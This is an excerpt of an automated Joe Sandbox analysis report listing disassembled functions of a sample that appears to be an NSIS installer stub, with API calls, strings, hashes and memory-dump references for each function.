Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281E0,?), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(004281E0,?,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(?,?,?), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8

Strings

%s%S.dll, xrefs: 0040679E
\, xrefs: 0040677A
UXTHEME, xrefs: 0040675B

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

unpacking data: %d%%, xrefs: 00402E33, 00402E43
verifying installer: %d%%, xrefs: 00402E3A

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 004028DD Relevance: 9.1, APIs: 6, Instructions: 72memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GlobalAlloc.KERNEL32(?,?), ref: 00402901
CloseHandle.KERNEL32(?), ref: 00402981

Part of subcall function 0040345D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040315B,?), ref: 0040346B

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969

Part of subcall function 004031D6: SetFilePointer.KERNEL32(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

DeleteFileW.KERNEL32(?), ref: 00402995

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
String ID:
API String ID: 488507980-0
Opcode ID: 5d9f1b6731ba3ee9933b863f84e8f8121980e79eb03ea1cc287d750f51a4a2c2
Instruction ID: a72baa4c232b972dd9d74bdb0255e4e47dd94c062f2630ea412bfe515796ae85
Opcode Fuzzy Hash: 5d9f1b6731ba3ee9933b863f84e8f8121980e79eb03ea1cc287d750f51a4a2c2
Instruction Fuzzy Hash: 7A216DB1D00118BBCF116FA5DE48CAE7E79EF09364F10013AF5947A2E0CB794D419B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

%u.%u%s%s, xrefs: 00404C97
(7B, xrefs: 00404C9F

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
